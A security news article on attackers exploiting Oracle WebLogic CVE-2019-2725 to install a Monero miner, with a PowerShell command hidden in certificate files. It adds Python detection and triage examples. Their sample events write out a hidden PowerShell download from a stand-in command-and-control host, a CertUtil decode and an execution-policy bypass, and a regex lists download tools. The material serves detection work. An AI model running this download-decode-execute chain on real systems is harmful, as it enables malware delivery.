11 June 2019

Hackers weaponize critical Oracle WebLogic vulnerability in cryptojacking attacks

Hackers are abusing the recently patched Oracle WebLogic Server vulnerability CVE-2019-2725 to deliver a Monero miner to vulnerable machines. The bug is a deserialization issue that allows unauthenticated remote command execution. The vendor fixed the flaw in late April, one week after proof-of-concept code for it was published online and cybercriminals started using it to install cryptocurrency miners.

In a new report, Trend Micro's researchers shed light on some of the activity involving CVE-2019-2725. The observed campaign has an interesting twist: the malware hides its malicious code in certificate files as an obfuscation tactic.

Once it reaches the target machine, the malware exploits CVE-2019-2725 to execute a command that performs a series of routines. First, PowerShell is used to download a certificate file from the command-and-control (C&C) server, which is saved in %APPDATA% under the name cert.cer. Then the legitimate CertUtil tool is used to decode the file, and the decoded content is executed using PowerShell. Finally, the downloaded file is deleted using cmd.
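The chain just described (a PowerShell download of a .cer file into %APPDATA%, a CertUtil decode, execution of the decoded output by PowerShell, and a cmd deletion of the original) is a useful process-creation pattern for a detection rule. The following is an added example written for this article, not code from the report or from Trend Micro: it correlates those four stages by the certificate file name across a handful of constructed process-creation events. The `ProcEvent` shape, the sample command lines and the host name `c2.example.invalid` are all assumptions made for the example.

```python
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """Minimal process-creation record (constructed shape, like a Sysmon event 1)."""
    pid: int
    image: str      # executable name
    cmdline: str    # full command line


# Constructed sample events, shaped after the chain described in the article.
SAMPLE_EVENTS = [
    ProcEvent(4100, "java.exe", "java.exe -Dweblogic.Name=AdminServer weblogic.Server"),
    ProcEvent(4120, "powershell.exe",
              "powershell.exe -nop -w hidden -c (New-Object Net.WebClient)"
              ".DownloadFile('http://c2.example.invalid/cert.cer', $env:APPDATA + '\\cert.cer')"),
    ProcEvent(4121, "certutil.exe", "certutil.exe -decode %APPDATA%\\cert.cer %APPDATA%\\update.ps1"),
    ProcEvent(4122, "powershell.exe", "powershell.exe -ExecutionPolicy Bypass -File %APPDATA%\\update.ps1"),
    ProcEvent(4123, "cmd.exe", "cmd.exe /c del %APPDATA%\\cert.cer"),
    ProcEvent(5000, "certutil.exe", "certutil.exe -verify legit.cer"),  # benign CertUtil use
]

DOWNLOAD_RE = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|\bcurl\b|\bwget\b", re.I)
DECODE_RE = re.compile(r"certutil(\.exe)?\s+.*-decode\s+(\S+)\s+(\S+)", re.I)
CER_NAME_RE = re.compile(r"([\w.-]+\.cer)\b", re.I)


def _basename(path: str) -> str:
    """Last path component, lower-cased, with surrounding quotes removed."""
    return path.replace("/", "\\").split("\\")[-1].strip("'\"").lower()


def detect_certutil_chain(events):
    """Correlate download -> certutil -decode -> execute -> delete by .cer file name.

    Returns one finding per certificate file that was decoded with CertUtil and
    seen in at least one other stage of the chain; a lone decode is not reported.
    """
    findings = {}

    def entry(name):
        return findings.setdefault(name, {"cer": name, "stages": set(), "pids": []})

    decoded_outputs = {}  # basename of certutil output -> basename of source .cer
    for ev in events:
        low = ev.cmdline.lower()
        image = ev.image.lower()
        cer_names = {n.lower() for n in CER_NAME_RE.findall(ev.cmdline)}

        # Stage 1: PowerShell fetching a .cer file from the network.
        if image.startswith("powershell") and DOWNLOAD_RE.search(ev.cmdline):
            for n in cer_names:
                e = entry(n)
                e["stages"].add("download")
                e["pids"].append(ev.pid)

        # Stage 2: CertUtil decoding that .cer into some output file.
        m = DECODE_RE.search(ev.cmdline)
        if m:
            src, dst = _basename(m.group(2)), _basename(m.group(3))
            if src.endswith(".cer"):
                e = entry(src)
                e["stages"].add("decode")
                e["pids"].append(ev.pid)
                decoded_outputs[dst] = src

        # Stage 3: PowerShell running the decoded output.
        if image.startswith("powershell"):
            for out, src in decoded_outputs.items():
                if out in low:
                    e = entry(src)
                    e["stages"].add("execute")
                    e["pids"].append(ev.pid)

        # Stage 4: cmd deleting the original certificate file.
        if image == "cmd.exe" and re.search(r"\bdel\b", low):
            for n in cer_names:
                if n in findings:
                    findings[n]["stages"].add("delete")
                    findings[n]["pids"].append(ev.pid)

    return [f for f in findings.values() if "decode" in f["stages"] and len(f["stages"]) >= 2]


if __name__ == "__main__":
    for finding in detect_certutil_chain(SAMPLE_EVENTS):
        print(finding["cer"], sorted(finding["stages"]), finding["pids"])
```

The benign `certutil -verify` event is deliberately included: CertUtil is a legitimate administration tool, so the rule keys on the `-decode` switch combined with a surrounding download or execution, not on CertUtil alone.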

The certificate file looks like a normal Privacy-Enhanced Mail (PEM) format certificate, but its body is a PowerShell command rather than the X.509 certificate data the format normally carries for TLS.

“One interesting characteristic of the downloaded certificate file is that it requires that it be decoded twice before the PS command is revealed, which is unusual since the command from the exploit only uses CertUtil once,” said the report.
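Because CertUtil will happily decode any base64 body between PEM header lines, a file that looks like a certificate need not contain one. The following added example (written for this article, not code from the report) shows how a triage script can tell the two apart: a genuine X.509 certificate decodes to DER, whose first byte is the ASN.1 SEQUENCE tag 0x30, whereas the file described above decodes to more text, and only the second decode yields the PowerShell command. The sample files, the `Write-Output` payload and the DER stub are constructed for the example; the stub only carries the SEQUENCE tag and is not a real certificate.

```python
import base64
import binascii
import string

PEM_HEADER = "-----BEGIN CERTIFICATE-----"
PEM_FOOTER = "-----END CERTIFICATE-----"
PRINTABLE = set(string.printable.encode())


def pem_wrap(payload: bytes) -> str:
    """Wrap bytes in a PEM-style envelope (what certutil -encode produces)."""
    b64 = base64.b64encode(payload).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\n".join([PEM_HEADER, *lines, PEM_FOOTER]) + "\n"


def pem_unwrap(text: str):
    """Return the base64-decoded body of a PEM envelope, or None if text is not one."""
    if PEM_HEADER not in text:
        return None
    body = [ln.strip() for ln in text.splitlines()
            if ln.strip() and not ln.strip().startswith("-----")]
    if not body:
        return None
    try:
        return base64.b64decode("".join(body), validate=True)
    except binascii.Error:
        return None


def classify_certificate_file(text: str, max_layers: int = 5):
    """Peel PEM layers and report what is inside.

    Returns (kind, layers): 'der' when the payload starts with the ASN.1
    SEQUENCE tag (as a real X.509 certificate does), 'text' when the final
    payload is printable (a script, for instance), 'binary' for anything else,
    'not-pem' when the outer file is not a PEM envelope at all.  layers is the
    number of decodes that were needed, so the file from the article scores 2.
    """
    layers = 0
    current = text
    while layers < max_layers:
        payload = pem_unwrap(current)
        if payload is None:
            return ("not-pem" if layers == 0 else "text", layers)
        layers += 1
        if payload[:1] == b"\x30":
            return ("der", layers)
        if all(b in PRINTABLE for b in payload):
            current = payload.decode()   # may itself be another PEM envelope
            continue
        return ("binary", layers)
    return ("too-deep", layers)


# Constructed samples: a harmless command wrapped twice, and a DER-like stub.
INNER_SCRIPT = b"Write-Output 'constructed sample payload'\r\n"
DOUBLE_WRAPPED = pem_wrap(pem_wrap(INNER_SCRIPT).encode())
DER_STUB = pem_wrap(b"\x30\x82\x03\x00" + b"\x00" * 16)  # SEQUENCE tag only, not a real cert

if __name__ == "__main__":
    print("double-wrapped script:", classify_certificate_file(DOUBLE_WRAPPED))
    print("DER stub:", classify_certificate_file(DER_STUB))
```

Any `.cer` file that classifies as `text` with two or more layers matches the characteristic the report calls unusual; a file classifying as `der` after one layer is what a certificate downloaded for legitimate reasons should look like.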

The PowerShell command in the certificate file downloads and executes another PowerShell script in memory, which in turn downloads and executes several files, including sysupdate.exe (the Monero miner), config.json (the miner's configuration file), networkservice.exe (an executable possibly used for the propagation and exploitation of WebLogic), update.ps1 (the PowerShell script run in memory), sysguard.exe (a watchdog for the miner process), and clean.bat (which deletes other components).

The update.ps1 file, which contains the decoded certificate file, is replaced with the new update.ps1, and a scheduled task is created that will execute the new update.ps1 every 30 minutes.

The idea of using certificate files to hide malware is not a new one, but attacks utilizing this technique had not been observed before. However, the researchers pointed out that for the time being the hackers behind the above-mentioned campaign appear to be only testing this obfuscation method, as the other malicious files are downloaded without being hidden in a certificate file.
